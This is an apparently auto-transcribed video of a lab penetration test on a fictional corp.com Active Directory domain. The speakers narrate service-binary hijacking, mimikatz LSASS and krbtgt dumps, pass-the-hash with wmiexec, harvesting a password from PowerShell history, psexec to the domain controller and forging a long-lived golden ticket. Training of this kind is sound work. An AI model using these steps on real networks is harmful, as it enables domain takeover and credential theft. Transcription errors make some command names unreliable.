match the the service we're going to try to take over right but for now add user.txt we do LS and we do have the file here so our malicious file is now in place on the Windows machine the only thing that is left to do now is to Simply replace the file uh the MySQL D file and try to start the service again what I like to do if I'm allowed from the client to do this I always take a backup of the original file anyway right so we're going to go ahead and move the file in MySQL or XM MySQL bin and MySQL D dot exe to the current working directory we can call it backup MySQL D dot exe right if you do this this this allows us to replace the file again later with the original one and then the SQL Server should should start up again right what we need to do now we need to add the add user.exe to the original location of the MySQL D dot exe and restart the service so in this case I'm going to remove an in the current working directory we have the address exe we're going to move it to the C column xampp MySQL bin and this is where we can rename it we can either renamed it earlier as well but but I just like to do it this way we need to do it correctly if you have a typo here that the service is not going to start right so my that was a typo right away MySQL d dot exe sounds like a human man yeah I think I hope this is correct it looks correct right MySQL d dot exe Okay cool so we do this we didn't get any errors because we are built-in user uh with full access to to this file so we we are able to do this even though the service was running right yeah the service is still running the executable is used to start the service and this service should probably still work I mean it might depend a little bit but I know that it's gonna crash completely when we try to restart it at least right yes let's go ahead and do our next stop my sequel that's the service name and you know as usual penetration testing we have another obstacle here access is denied we can argue that this is something we should have checked beforehand or be in fact able to restart this service and we should have probably checked that right right I mean what kind of options do we have we have Mario that is logged in on the machine we don't necessarily want to lose Mario right I was gonna say you could reboot but then you're going to lose it right yeah either real world you would maybe not in Remy's lab right we'll see so we're going to try to simulate this as good as possible like in the real world now you could potentially social engineer someone into logging in and starting in the service that that might be a little bit uh you know unrealistic or we could social engineer an admin to go in and restart the service we can say it's Crash store or something like that maybe we could even contact Mary hey can you do a restart on the machine and we we call Mario oh yeah of course of course the f I can do a restart here and I'll just continue my work later and she's going to log back in again and we're gonna be admin and everything is just cool right so hopefully that's going to be the case here we'll see now I'm gonna run another command here so again we're running net or get net Sim instance same as before but in this case we are targeting the MySQL service itself and instead of looking at name and stuff like that we're going to look at the start mode for the service because we want to see okay how does this service actually start and the start mode is automatic this means that if the server restarts the service is also going to start running our malicious call the only option we have in this case would be to restart it ourselves but we don't even know if we have permissions to restart the server right maybe we need to brute our brute force ourselves into their server room and kind of just knocking out the server and you know click the button who knows but in this case I actually found a really cool way to find out whether or not we can restart the server I found this yesterday and I I have never used this before we can do restart computer in um in Powershell right and we can just run this and see okay are we able to restart but if we add what if here this is this is pretty cool so it's not going to run a restart computer but it's going to tell us okay what happens if I run this Command right the what if here is it's going to perform the operation which is in quarter enable the local shutdown access rights and restart the computer on target localhost yeah On Target low gloss the web O2 right so if we run this it's simply gonna restart another way of finding out whether we have the option or not is to do who am I slash priv and we can have a look for the SE shutdown privilege here right so we can use the the shutdown privilege here it's currently disabled but this is just because it's not in use right now right so the fact that this even shows up in this list tells me that I am able to restart the computer so let's just do this with Powershell restart computer boom and it's restarting now if we go back to the original tab we can see that we disconnected from Michael we're not connected to Weber 2 anymore which makes sense because the server went down right so now we may have to wait a little bit and while the server restarts and we could log back into Michael and check if our Mighty user is there or we can simply just try to log in as mighty right with a username and a password we had so we can log in with X3 RDP again with the user Mighty with a password to the same machine but in this case we are not specifying the corp.com domain right because we don't have a domain user but hopefully this one is going to be a local admin on the machine that was the account that you created with your C program right correct yeah so let's just cross our fingers and hope that this worked it's highly theoretical it seems like we're getting something here at least let me maximize this we are getting windows we are taken to something called or taken to something called the server manager and yak we don't we don't need this graphical stuff so I'm just gonna go ahead and start command prompt again I'm gonna now right click the command prompt and hope that I can just bypass this USC right without credentials and we can see here we are not asked for credentials we can simply type yes and we should now be in a high integrity label or level on this machine so we can do who am I we are Mighty and this also further illustrates that we are not the part of the domain right we are logged in directly on demo 2. if I do here are my groups and this is where it gets uh you know interesting right looking at this bad boy right here we are a part of the built-in administrators so we just escalated our privileges using a service that was misconfigured by the sysadmin it had nothing to do with xampp really that there is no vulnerability there in that version as far as I can tell at least for permissions but the C submin did a poor job here right doing this kind of stuff we escalated our privileges that's cool let's go back to our documentation and the attack path if if you are admin we're going to try to steal Mary's credentials now in the real world we re I mean we rebooted this machine Mary might not be logged in anymore but in Remy's lab she is she's automatically logging in her for the purposes of the the proof of concept we want to show here but in the real world now you would probably try to monitor this machine a little bit and once someone logs in there you can use your admin user and try to steal their credentials and now we are kind of slowly going into the active directory portion of the of the of the call again right I'm now going to go ahead and clear the screen I'm going to go into the C column users directly or directory and the mighty folder we have our own profile here now I'm gonna create a new folder called pen test so we created a new folder called pen test let's move into it and we do Powershell I just like Powershell so much because I can do control L and this happens it's just it's just so fantastic and it also supports LS right exactly I'm so used to so in this photo bit we have nothing and finally we are gonna dive into a little bit of mimikats actually many of the viewers probably heard about mimikas before if you're into penetration testing and this is the tool we're gonna use to to hopefully do some magic here I'm gonna try to explain as detailed as possible what we're gonna do but the first thing we need to do is to actually download it right we have our pen test folder shared on our Python 3 web server so um do I remember my IP I actually think I do that would be that would be rather crazy so we are serving mimikats in a pentas folder and the out file we can just call it mimical series well mimicats dot exe like this this is a little bit bigger so it's going to take a little bit more time to download um there we go if you do a lesser here now we have a mimic at CXC on the machine right we're gonna start well actually we can keep it like this for now we're gonna have to do a little bit of theory before we move on now we're going to use this tool called mimikats and we're essentially gonna tap up into a process or the memory of a process called Elsas this one also has a really complex name such as eye cackles earlier it's actually the local security Authority subsystem service and their lord what uh what a complex thing I'm just going to refer to this data as Elsa's right in active directory we have two main authentication methods we have Kerberos which is the default and it was released I think in 2000 has been the default ever since and we also have something called ntlm authentication which is also enabled by default in in active directory it can be disabled but based on my experience in penetration testing and to submin it's just there right it just works and you know it works with the older applications the third party application Etc if Kerberos isn't available for example ntlm is just gonna come in and save the day right however ntlm is rather insecure right now I I don't necessarily need to dive too deep into the technical details here and this might just be my opinion but when you obtain access to an mtlm hash for a user somehow which we're going to show in a coupler hopefully right you can use that hash to gain access to whatever that user also has access to right you don't need their password you can do something called opacity hash attack and that's just such a nasty attack to be honest like it's really cool as a pen tester once you get access to a to ntlm hash then you can use it like that but it's not really good for for security right if you want to protect your environment I would say that's probably one of the most insane well not insane but scary parts with ntlm so if you get the hash you don't need authentication you can just go straight in right you need to authenticate but you can just use the hash to authenticate here you don't need a password anymore so like a cookie on a session or something essentially yeah and you can set a strong password like super strong password but the ntl image is still just gonna let you in right so yeah but the password strength doesn't really matter too much if you use that authentication mechanism right Kerberos is is different and we have a whole module in pen 200 that explains this but essentially Kerberos is air balls around the issuance of tickets and the usage of tickets for authentication purposes right we can give a really quick and high level overview over the two but the default is Kerberos so if you use Kerberos you sit down at your computer your Windows computer I mean it can also be a Linux computer but we are focusing on Windows here you log in with your username and your password right and you you essentially do the same for ntlm as well you you you you will come in with your credentials in order to authenticate to the domain or other resources in the domain right yeah so you type your password then the the client is going to send something called the authentication server request and this is going to sound a little bit maybe crazy technical if you haven't heard about Kerberos before but the authentication so request as Rec is being a like Ace Rec for short right is being sent to the KDC which in most cases runs on a domain controller and KDC stands for key distribution center now we can call this a package or let's call it a request right we can just call it request for short and this request contains a timestamp which is encrypted using the hash which is derived from the password of the user logging in then the domain controller is going to receive this request and since the domain controller has access to all the password hashes it's going to look into its own okay where is the password hash for Michael for example right and it's going to try to decrypt the timestamp using the same hash and if those are matching authentication is successful right at that point the domain controller is going to reply to the client with something called authentication server reply or as rep and this contains the the juice information we are after it contains a session key and something called a ticket granting ticket and the session key is encrypted with the user's password but the tdt itself is is the real interesting part here this can takes information about the user such as the username what groups the users has access to for example so if you're a domain admin that's going to be reflected in the TGT and the TGT is also encrypted using the secret key which is the ntlm hash for the krb tdt account I talked about earlier the very super important account in active directory and the capability is only known to the KDC right after this the client or the user essentially showed the ticket to the KDC whenever it wants access to our resource right so let's say for example user Michael it logs into the domain he wants to RDP to the Weber 2 machine Michael's computer is going to send a ticket granting service to the KDC requesting a service ticket then the KDC is going to verify well it's going to send a request for TDS right the KDC is going to verify the tdt to make sure it's valid and if it's valid it's going to send a service ticket back to Michael's computer and then essentially Michael's computer is gonna send this service ticket to the level 2 Machine level 2 is going to crypto ticket verifies to access permissions and let him log in right right so so that was Kerberos explained right I'm gonna briefly explain ntlm as well this is more of a challenge challenge response kind of thing so when Michael for example logs into his client the client is going to calculate his ntlm hash based on on the password and it's going to be stored in memory on the on the client right the client is then going to send the username to the server where Michael wants to connect let's say this is Weber 2 again as an example the service that I'm going to respond with a challenge this is just a random value so the client is going to receive this Challenge and the client is going to encrypt the challenge using the ntlm hash based on Michael's password and send this back and this is known as a response then web or two gonna re receive this and it's going to forward the response the response itself the username as well as the challenge to the domain controller or the yeah the DC right the DC as always has access to everything in the Kingdom it's gonna look up the the ntlm hash for Michael stored in active directory and is going to try to encrypt this challenge itself using the stored ntlmash for Michael and then compare the challenge it encrypted itself as well as the response it got from Michael and if those match DC is going to confirm the authentication and the server is going to be you know granted access okay so now we have a little bit of a background information Kerberos versus ntlm and when exactly is ntlm used right yeah I've seen ntlm used in so many Enterprises during my penetration testing it's it's actually kind of crazy but it's it's nothing wrong with it really but you would probably try to get away from it at some point but if a user authenticated to an IP address instead of a hostname for example the ntlm authentication is used if I user authenticates to a hostname which is not registered in the ad integrated DNS server ntlm is used third-party applications of news and tlm as well it's it's very easy to set up an ntlm authentication in for example a web app for example I've been there done that right I'm struggling with that these days actually by the way to to get Kerberos running properly but yeah we find it a lot and if you are a system in and you kind of want to get away from ntlm and only use Kerberos make sure that you plan everything accordingly because systems might break they might not be you know compatible with Kerberos for example and do it during a maintenance window after careful planning and really mapping out your environment you just don't want to go somewhere and hey we're just going to disable until I'm going to see what happens but in my domain it would probably be fun because I only have six machines but a normal domain is usually a little bit bigger than this right so right now we're going to go back to our um our Command Prompt here whether it's tickets or hashes in memory don't really care too much because hopefully when we tap into the Elsa's memory under the right circumstances we will be able to get both tickets and hashes hashes are just easier to use in my opinion and we're gonna focus on hashes for now and get into tickets a little bit later I mentioned Elsas that's a process that that functions as a part of the operating system uh windows in this case and it's a part of the process that maintains and enforces security policies authentication and that kind of stuff and both tickets and emptyline hashes may be stored there let's stop with the theory and get back to you know the hacking right so I'm gonna start memicats here thank you that you know AV didn't get this uh mimikatz is you're going to be caught by AV or edrs if you use this on our normal penetrator test talk with a client before and see if you can whitelist something or if you're into it you can try to bypass AV as well but that that's not really what we are covering here now where we are working in an open field right learning the basics in your Advanced courses you cover some of that AV evasion is that right or is it yeah the pwk no that's correct well we have a module in in pen 200 as well for Aviation and those techniques we show there might actually work in this scenario we have some some really cool techniques there that allows you to bypass a Defender for example and that kind of stuff but if you are going much deeper into that when we when we get to pen 300 for example and Aviation can really be tricky but it's it's all logic right so you just need to kind of sit down with it and learn it and that's pretty much it so we're going to start moving cats and this is how it looks looks awesome right no uh no graphical stuff or anything it's just text uh we can see the developer here we have the version this is just a fantastic tool when it comes to to pen testing on active directory we also have a reference to something called ping castler I just want to mention this briefly I actually use pink castle quite a lot when I was doing pen testing it's a really great enumeration tool for active directory you literally download it you run a exe file it's gonna gather a whole bunch of data for you and present it to you in a report I mean it might even find some some nice vulnerabilities and yeah I like the tool anyway we're not focusing on enumeration we're going to focus on something else we're going to try to get that marry hash finally right I'm going to type a command here and explain a little bit what it does we're going to run something called privilege debug and this is essentially going to enable this SE debug privilege it's going to allow process we are running in here to access certain level or certain system level resources right essentially we need to run this to be able to dump Elsa's memory and extract hashes so it's just a command we need to run here we don't need to know exactly what is going on under the hood and we can see that the privilege is okay the only thing we need to do now is to tap into this process and try to get the login passwords Mary she is logged in here and hopefully she has a login password stored in memory so to do this we're going to do secure LSA log on passwords so we are now essentially tapping into the this lsas process or LSA local security Authority is is the name for that one and this is going to give us probably a lot of output right so let's try and the terminal goes kind of crazy here we saw a lot of text fly past our screens and we have more more down here right now this is dumping every single hash on the machine for example the username Bebo too so this is probably a hash for the machine account in active directory for the web O2 we don't necessarily care too much about it we can also see a username dwm1 here Windows manager so this is nothing to do with the corp.com and we are interested in Mary from corp.com right so we will just have to do some scrolling here until we find it and here we go actually we can see here that we have a authentication ID we have a session and we have a username Mary this is what we're after we can see the domain as well Corp and the login server is dc01 we even have our her login time and if you look at the login time compared to the reboot it seems like she logged in pretty much right away after the reboot thank Lord for Lord for that right we need to trust in some magic from time to time yeah I mean in the real world you would have just waited but I mean obviously a lab was speeding things up because otherwise there's no point waiting around yeah I would make sure to monitor this machine the web or two machine like crazy all the time to see if anyone logs in there because once someone logs in you might be able to get their ntlm hash as we're doing here right we can see the ntlm here for Mary and this is everything we need to impersonate the user I'm gonna go ahead now and just copy this and I'm actually gonna minimize windows and we're gonna look at a possible uh lateral movement technique right so we're gonna do this from Cali I'm gonna start a new terminal here I think this might be good we'll see uh how the outputs is going to look like we're going to use something called wmi exec right within packet this is a tool installed defaulting kale I'm gonna show the help Syntax for it I think it's the user being impact get let's see impact get wmix I think there's a lot of tools there WMA can be used by systems to remotely manage systems right like the same with Sim it can be used to to you know do certain things and in this case we see the usage here we have a Target this is important so we can use domain forward slash username we can supply a password we can do at Target name or IP address more importantly if we look a little bit further down here it supports hashes lmhash and empty hash and we have an empty hash here right so we essentially need to use the packet wmix we point to we want to use the hashes authentication we Supply Mary sash her username and the IP we want to connect to which in this case is going to be file soul to a new server right so let me clear my screen user bin in packet wmi exec hashes and we are not going to use the the LM part we're going to use the ntlm and yes it was on my clipboard Corp forward slash Murray at the IP address so when need IP address for files or two now we can go back to our documentation and find it this is the IP so let's copy it I just paste it in there now we need to keep our fingers crossed now and hope that this is going to work because there are some prerequisites for this to work we need Port 135 I believe it is to be open on the target which is often the case in our domain environment like this we also need to be a domain admin no well I'm sorry we don't need obviously not a domain admin we need to be a local administrator on the machine and as we have seen local administrator can be a domain user or a local user right and this is also relatively common and we have been able to compromise Mary which according to our enumeration is an admin on file SO2 so let's launch this and see what happens and we can see that we are indeed getting uh getting a prompter now in this case we use wmix we could have used a bunch of other tools as well we could probably use Metasploit uh has some some modules that supports hashes mimikats itself evil winner RAM and crap crack mapex SEC and so on this is just one example right if I do a hostname it's gonna it's a little bit laggy now right but essentially we see that we are connected to file so too if we do who am I we are logged in as Mary but we never use their password right so this is the example of using the hash of the intium ntlm hash that you corrected and just going bypassing all the authentication yeah so this is the known as pass the hash technique right and no matter how complex password Mario would have here we would still be able to log in with our hash right so it's kind of scary and you use mini catch just to grab that from memory or something or because you log into the machine right yeah so from a web or two where Mary was logged in we'd be tapped into the memory and we extracted our hash essentially that's right yeah but it requires local admin access so you you want to know your privileged escalation techniques and you want to make sure that you you get you you do as much as possible with uh with the lateral movement techniques and the users you get you want to get to know them and see okay what can I do with this user here and there it's a great demonstration because you what is it was it Michael the original user right that RDP into a server and then you used some kind of dodgy software to escalate major privileges to local admin right and then your own memicats to get the hashes and now you've just used this hash to log into another server yep so just as a recap we can go back to our documentation on the attack paths we start with Michael we are deped into Rebel two if we were admin we wanted to steal the credentials for Mario which we just did but we were not the admin right yeah so we replaced that uh original MySQL D file with our own malicious nasty file right got we did get the admin access and we just dumped Mary's credentials from memory on verbal 2 and based on the users and groups here Mary is a member of the local admfs so with that we have now accessed file SO2 using our new lateral movement technique called wmix so so far our plan is going really well right all the theory we had here actually proves to be true who's that dodgy guy that built this infrastructure yeah I mean who knows right I'm I have to find someone to blame yeah uh we we will just blame Jeff because he's the main admire right but now we are essentially coming coming up to this question mark and we are now going to start exploring some territories we haven't seen before and remember I said my goal was to get domain admin in this pen test and with with admin access to the file server I mean we could do a few am I slash pre no groups here with Mary right this is a little bit scrambled now but we can see here that we are a part of the built-in administrators group as married so on a file server in a domain you might find a lot of things you might find home folders which can contain God knows what right a lot of different things you might find admin shares with script or old scripts that are not used anymore with hardcoded credentials and that kind of stuff only the imagination can can really stop you here right but we need to loot the system and at this point uh I'm gonna be really quick about this we're not going to do any crazy escalations or anything here we're gonna have a look at the users folder and see something that should just not happen in a in a in an environment right we can see first of all the local has been logged in that's fine I'm gonna forgive you as an administrator for logging into your server that's fine but this administrator.corp this is the domain admin himself like the built-in actual domain admin for the domain just don't do this right never never browse around on your domain admin and to make things even worse jeff which is also the main admin has been logged in here right and imagine what can happen if for example one of those log in and we are sitting here with admin access mimikats ready a domain ad logs into the box we can dump their hash or ticket and just impersonate them somehow right in this case we we don't have any logged on sessions but I'm gonna just we're gonna enumerate Jeff a little bit here so I'm gonna go into his folder and if we do now we are in CMD I'm going to dur and we have access to desktop we have access to a lot of things right whether I'm mostly interested in right now is to have a look at his Powershell history and that's usually stored inside something called app data which is a hidden folder we don't necessarily see it here but we can browse to it then roaming if I remember correctly let's see roaming uh Microsoft spelling mistake yeah that's a spelling mistake sorry about that roaming I could copy and paste this as well but I want to show that I can actually type on my keyboard as well right so Microsoft Windows Powershell PE Let's see PS read line yes we actually have access to the console host history which is Jeff's Powershell history on this machine right who knows what's there and let's get saved by default right yeah this is the default folder I mean you can turn this off and everything but this is a default setup I haven't touched any of the dfl settings in Windows here this is as default as it gets so if you have logged into this machine he did some fancy stuff in Powershell and this is default where we're gonna figure out right so let's copy this and we're simply just gonna type it to the terminal and obviously this is a little bit fabricated for the demo but we can see DF has been doing some really strange stuff here it seems like he's doing some trusted host stuff with a domain controller uh he's testing a Vina REM config integration towards the DC and it seems like he's trying to to log in right we have a username here that Jeff typed in here we have a really strange variable PWD I don't know why I put that here but we can see a password here which says I need ocp now one two three and I I would absolutely agree with Jeff uh in this setting like Jeff you need ocp you you need to get your stuff together man you shouldn't be working as a system admin if this is the case right but I mean so there's a credential stored in in in history right yeah but I mean this kind of stuff happens in the real world oh yeah yeah I've seen this happening so many times and one of my favorite favorite things to look at if I see someone has been logged into a machine and I have admin access to the machine I mean the only reason we can see this is because we are a local admin right but then I really like to go through the the Powershell history because you can find so many cool things there from time to time right so obviously this is speed up a little bit compared to what you will see in a normal pen test but I wouldn't be surprised if this was the first folder I would check here especially since I know Jeff is a domain admin he's he's a prime target in this case so is that a password that he just typed or is that a password that he used in a script or something now this is probably something he typed into this PWD variable I don't know why he did it uh because in this case he could essentially do username equals Def and he could do the enter psession here and this credential is gonna pop up uh uh you know type your password or your username here and that's going to be used in the session right so this is just a typo yeah being lazy or just not you know too careful about what you're doing I would say that this is not the the only or the worst mistake he did the worst mistake he did here is to connect to this file server with this domain admin you shouldn't you just should not do that domain admin should be really really restricted in a domain environment now we don't know if this password is going to work though so but obviously we're gonna copy this and I'm actually just gonna add it let's add it to the documentation down here and Jeff domain admin like this and we just copy it there so we have it handy it should be in my clipboard as well based on this we could try to do some Vin RM stuff but uh I'm rather more interested in trying to connect to for example client of one using the Jeff credential right so I'm going to start a new tab here and I'm gonna do a little bit of copy paste again X3 RDP here like this so we're now going to try to log in with Jeff the domain admin with the password we found to The corp.com Domain this is the IP address for client one and again this is just me trying to to make this look as good as possible right we enter and let's see what happens Jeff here welcome Jeff let's see if we get something more this might take a little bit of time because he may not have been logged into this machine so it has to create a profile and all of that kind of stuff right let's go ahead and try to start cmds administrator right away if we are domain admin we should also be admin on a local machine and it seems like we are let's zoom in who am I we are Jeff who are my group we are domain admin right so mishna accomplished essentially and the attack vectors has been fairly straightforward here but you you can see this in a real world and uh it's um it's a lesson learned especially for Jeff Fury yeah you shouldn't browse around with your domain admin in fact you shouldn't be a domain admin at all in my organization he wouldn't be so on a normal pen test if the goal is to main admin this would essentially be enough uh you would screenshot this and show hey we are logged in as domain admin we have we have control over the domain now and you wouldn't necessarily do anything more right now we can move into a little bit more of a mindset of a malicious hacker because a malicious hacker would probably not stop here right when you get to Main admin that's kind of where the fun begins you you can start doing doing bad stuff I really don't recommend doing this I work as a pen tester but I know kind of have a how a malicious hacker would think about this we're going to use this domain admin for for something bad right so first of all let's go to the C column tools folder I have one of those on on this machine as well let's start Powershell and do a less so on this machine I have my hacking tools including mimikats power review and PSX right in this case we're actually going to use PS exec to see if we can gain access to the domain controller now this also requires a few prerequisites but we are domain admin so we should be pretty good let's see PS exec and we just point to the dco1 and we want to try to start CMD exe this is going to take a little while so this is running while this is running I'll I'll explain a little bit for this work you need to be a part of the local admin group on the DC domain admin might be that right the admin share must be available but those are normally the default setting on the modern system today essentially what's happening here now is PSX was trying to start the the PSX SVC exe service on the domain controller uh this is going to create a service or spawn a service on a remote host which is in this case is a domain controller right and the CMD here is now a child process of the PSX svc.exe essentially we also need Port 445 and I believe it is UDP Port 137 open to do this if I do hostname I'm not going to be able to clear my screen here and stuff because that doesn't really work too well with the PSX but we do hostname we we are indeed logged into the domain controller and if you are my we are Jeff I'm going to move a little bit into the the devastating attack that I talked about earlier right now we have the keys to the kingdom we are domain admin and we should celebrate right this is cool but what if we want to have some persistence here that is kind of flying a little bit under the radar let's say we want in five years from now log into this domain again Ask domain admin we could try to add our own domain administrator here but that is something that can be easily kind of detected right if I go ahead and add the user Mighty here now and add it to the domain admins that's probably going to be detected eventually and that's maybe not a good idea here what I I'm gonna move into now is something we call the golden ticket and this is a persistent persistence method we also show in a pen 200 course right this is a really really nasty attack and if this is admin is not doing something about it you will essentially have it Journal access to the domain with the highest privilege possible what we're gonna do we're gonna Forge a ticket or a TGT that we're not going to use the KDC or the Kerberos login or anything for this we're actually going to fake this ourselves right this TGT is going to be appeared or it's going to appear to be signed by the domain's legitimate KDC itself and we're gonna gonna encrypt the ticket with a krb TGT password hash right which is used when you create or when you log into a domain if you use the Kerberos right to create a golden ticket we need the city for the domain that's a security identifier for the domain and we're going to see why in a couple here obtaining the seed on a domain is very simple we could have done that with the Michael user running Hue Mi slash groups and we will actually see the city for the domain and more importantly we need a krbt GT password hash there are two prerequisites for this to happen we need access to the domain controller with either a local admin or local admin on the domain controller or uh domain admin we're gonna try to try to forge a ticket we are on the domain controller I'm gonna go to the C column drive here or just a C drive we're gonna create a folder called pen tests again now on the domain controller we're gonna move there I'm gonna start Powershell I'm gonna do LS we have nothing there the output might be a little bit scuffed from time to time here uh because of the use of PSX so this is just kind of what you will have to become familiar with when you work as a hacker essentially so first of all we're going to download mimikats because we want to dump this password hash now for the krb TGT account right it's pretty similar to what we did earlier so let's do invoke web request URI HTTP and the IP for Calais meme cats dot exe hopefully my server is still running we're gonna write this to mimikats.exe on the domain controller the output again is a little bit messed up here but if we do Dura now or LS we have mimikats on the domain controller so we don't tend to spend a whole lot of time explaining exactly what's going on there I just wanted to to you know show the nastiness here so I'm going to start mimikats.txt that'll be we have the the same prompt as before again we're gonna enable the debug privilege foreign and we get a 200 okay because we are admin right we are a domain admin here now to dump the hashes we're actually going to interact with this uh LSA process again so we're going to do LSA dump this time around and we just want to dump the entire LSA we're going to do patch so LSA dump LSA is essentially gonna allow us to to dump the credentials stored in LSA essentially right since we are on the domain controller we're actually going to be able to find every single use rash stored on the domain controller including the krbt GT account which is which is the one we really need now right uh the patch share is simply just um I mean I think back in the days I didn't always need this but this is essentially going to inject a dll into the LSUS process and it's it's somewhat complex what's going on in the back there but it's going to hook and modify certain functions and it's going to allow memcats to read the hashes without triggering errors or access restrictions and that kind of stuff so let's just try to run this and see what happens right now the output is not as you know craziest earlier because we don't have a lot of information here but here for example we have the hash for the client of two client of one those are the machine accounts in the domain if you go a little bit further up here we have the hash for Jeff that's interesting we don't necessarily need this password we can probably do past Dash we have the hash for the Mi user which we haven't really interacted with in this pen test right but Mr is a user in the domain here we are married we have Michael we might recognize this one this is the same hash be done from verbal 2 earlier right going a little bit further up this is where the interesting thing happens so first of all we have the seed for the domain this is needed for the golden ticket I'm gonna explain why in a few I'm just gonna document this and add it to the documentation so domain Sid and we're going to get the krb TGT hash we're gonna paste that down here so let's go back to the domain controller this was not the domain controller I think where is the domain controller here we go so we have a seed we have the administrator itself the built-in administrator account we can get that hash as well but more importantly we are interested in krbt krb krb tdt account which is used to sign Kerberos tickets so we have every single ltlm hash from the domain here and we're going to copy the krb TGT and put it to our documentation and that's it we don't need anything more we don't need to do more fancy stuff on the domain controller so I'm going to go ahead and exit memicats here I'm actually just gonna do this and we are logged in on uh where are we logged in now let's see I don't even remember so many machines were compromised uh hostname okay so we are login on client to one as the Jeff domain admin just to prove how nasty this attack is I'm gonna log out or Jeff admin and I'm going to log back into the into the client of one here with the user Michael which is if you remember correctly it's a low privileged user in the domain the only thing you can do is to RDP to member too right wait enter and obviously we are able to log in this is the first user we used earlier and we are now logged in to um clienter one let's again start CMD we don't need any admin permissions now so we're just going to start this as a regular user let's go into the C column tools folder where we have mimikat stored I'm going to start mimikets now with no admin privileges we don't even need to do any privilege debug or anything what we can do is to purge all the tickets we have because we probably have some gerberos tickets there now since we're logged in we don't necessarily need to do that but let's do that just be sure a Kerberos Purge so now we have zero tickets and we're gonna finally create our own golden ticket right so let's clear the screen we're going to use Kerberos here and we're going to use the gold module for this we need a legit user in the domain which is well not Mighty well we could add Mighty as well but Michael we don't need a password the reason we I mean historically we didn't even need a valid user to do this but since I think it's July 2022 there was a patch that requires you to to have a valid user to be able to craft this this ticket right but since we don't need a password and you have seen how easy it is to enumerate users in the domain so and the domain here domain corp.com we need to make sure that we are doing this correctly otherwise the ticket we generate is going to be invalid right so the seed for the domain the security identifier for this domain is the one we found there let's paste it now we're going to do the krb tdt the hash which is going to be used to sign this ticket and make it appear valid now we have an option we can this is all you need for the ticket by the way right have the seed which is easily obtainable we have the Caribou TGT which is a little bit more tricky because you need access to the domain controller to do it right now we can choose we can use for example slash PTT to pass this ticket as is into our current session this is what we're doing in a course if I if I remember correctly but we can also create a file with a ticket that we can store and you know have on our you know USB stick or whatever for for for a long time I don't recommend doing this if you're a pen tester you just don't so that it's no reason to do this but I'm gonna point this to a ticket called Corp let's call it Corp golden so this is going to generate a file in the tools folder called Corp golden let's see if this works missing user argument I have a typo here let's just do this again like user not to you anymore with one new as well there so user Michael let's try and we can see that final tickets have to to file this would probably work even if we have some typos and stuffers we need to make sure that everything is correct we have the user Michael domain iscorp.com or.com no typos there we have the city for the domain user ID 500 I guess many of the viewers have seen this before but this 500 is actually for the built-in administrator in the domain so we are kind of hey I'm the admin we have a bunch of groups as well those are all high privileged we could choose which group this ticket should should appear to be a member of for example right if we want the ticket to be a member of the 502 group for example we would say slash group 502 and the the seed here is used to identify the domain well the group ID here is a relative ID which identifies the group right so I believe 502 is a domain admin and 519 I wonder if it's the the Enterprise admin right so this is the reason why we need the seed as well otherwise it's not going to be able to identify okay what domain is this below the service key this is where it's being signed typically this is done by the KDC but we are just doing this ourselves Now by faking the ticket and this is where it gets a little bit interesting so we created this ticket now on the 27th of April 2023 right you see the 2023 here David yeah do you see anything interesting or interesting in the expiry date here yeah yeah it's going to expire in year 2033 and I think well actually it's not completely 10 years it's three days off I think this might be due to leap years which I think is every fourth year or something they have 366 days in instead of 365 right but essentially by default this ticket is is um uh valid for 10 years and that's pretty pretty sick especially you're gonna see what I'm gonna do with this ticket eventually it's gonna make it a little bit more crazy before we do that however I'm actually going to create a even more crazy ticket because I did some uh some funny experimentation earlier in memicats we can do slash end in right in here we need to specify the minutes or we can specify the minutes we want the the user or the the ticket to be available and I was doing some research on the 32-bit integers and and that kind of stuff how big of a value can you actually put here and will the ticket actually be available for that amount of time and I found this 2 billion something something value to be the maximum amount now let's call this ticket Corp Super golden right and let's see at the at the expiry date we're going to end up with two tickets now they expired it well we created it today 24th of April right you're gonna live for a long time [Music] yeah so essentially if the CIS admin is not doing anything you know to combat this golden ticket we will essentially have access to this domain for 4 000 96 years or something like that so this is just obviously this is just kind of a fun thing right but it shows that it's possible and obviously if you have to do a golden ticket in the in a penetration test maybe you need to prove you know a concept or something set it to expire like 10 minutes 20 minutes or something like that you you really if your laptop gets stolen and someone gets hold of this Corp Super golden ticket now it's just so game over for this domain right and I'm gonna show why now I'm actually gonna exit out of mimikats I'm gonna exit CMD as well and start it over again just to prove uh what's going on here we're gonna go to see colon tools again we can start Powershell and do LS so this is just a basic user once again right yeah we are Michael now we have we have not injected any tickets right so if I do hear my groups here we are just Michael part of the RDP web so here are my groups we can see that we are just member of the user is nothing special going on here so LS we have the Corp golden but before injecting this ticket I just this is to prove that this works I'm gonna try to PSX now into the domain controller as Michael as our current user without the ticket injected and we can see that we immediately get an access is denied here so we are not able to to RDP well PSX act rather into the domain controller and we don't have any domain privileges right well not administrative ones anyway so ask Michael we're going to start mimikats again actually let's just do a LS Air Corp gold I want to copy this because this is the the ticket we're gonna use we could use both here but we're going to stop memicats and this just keep in mind that this can be done without any admin privileges and ejecting this ticket could actually be done on a computer that is not even a part of the domain and that's the that's that's really scary you could really take your laptop hook up to the network I mean you need to be able to communicate with the DC somehow but let's say you have some some misconfigured network you have a guest Network or something you tap into that to try to Ping the DC or communicate it communicate with it and you might be able to to get traffic right I've seen that as well so if you have access to the krb tdt then we can craft our ticket the only thing we actually need to do here is to do Kerberos PTT because this is a pass the ticket attack this is not mtlm hashes anymore and I'm just gonna feed it with a Corp golden ticket that is in my working tools directory right we hit enter we can see that the file Corp golden is okay it's now injected to our process in memicats now we can't just start CMD now because that that's not going to work because in that process we're not going to have the ticket injected right so I'm gonna do misc and just start cmd.txe from the current process instead where the ticket is injected that did not work we're just gonna do let me clear the screen there misc it's just CMD write this so we're going to start CMD from immigrats hit enter patch OK it says on the top there let's zoom in who are we we are Michael is there anything special going on here who are my groups nothing new here really let me zoom in and do this again so who are we Michael who are my groups nothing special right we are just a normal user the only only group you're a member of here in the domain is RDP web however with this ticket injected the memory let's try to do PS exec DC or one cmd.exe I can zoom in hopefully a little bit now right so we're doing this as Michael but we're gonna use our injected fake ticket and we're gonna present that to the KDC which is the key distribution center we're gonna try to get this service ticket and all that what I talked about earlier if we can trick the courtesy into believing that our tdt here is valid we should be able to be a PSX again into the controller or domain controller so let's see right this takes a little bit of time at least we're not getting uh we're not getting uh access denied right away right so we'll just wait for this service to start hopefully on the domain controller should be any moment now and we we will have a shell okay there we go who am I where Michael now who are my groups let me I need to zoom out a little bit here to to make this clear this is rather interesting let's see if we can we can get this uh who are my groups let's see so we just run who are my groups there on the domain controller with our golden ticket injected and we are now built-in administrators we have a lot of other things as well but we are also domain admin on Michael we are a 